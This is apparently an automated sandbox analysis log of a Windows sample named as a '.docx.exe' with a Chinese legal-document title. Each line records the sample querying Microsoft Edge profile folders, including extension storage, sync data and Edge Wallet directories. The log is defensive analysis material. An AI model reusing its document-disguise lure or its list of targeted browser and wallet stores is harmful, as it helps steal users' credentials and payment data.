Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.0_0\_metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\JumpListIconsRecentWorkspacesV2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Cache\Cache_Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\js\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Code Cache\wasm\index-dir VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\a72670a9-643e-4e4e-b4d5-e6019a48f42a VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_hint_cache_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\optimization_guide_model_metadata_store VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5959.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Notification VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Tokenized-Card VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Wallet-Checkout VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-ec\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\it VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ja VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\nl VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-BR VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\pt-PT VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\ar VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\de VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\en-GB VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\es VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\fr VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\fr-CA VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\id VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\#U8d77#U8bc9#U6750#U6599#U548c#U501f#U6b3e#U8bc1#U636e.docx.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-mobile-hub\it VolumeInformation	Jump to behavior
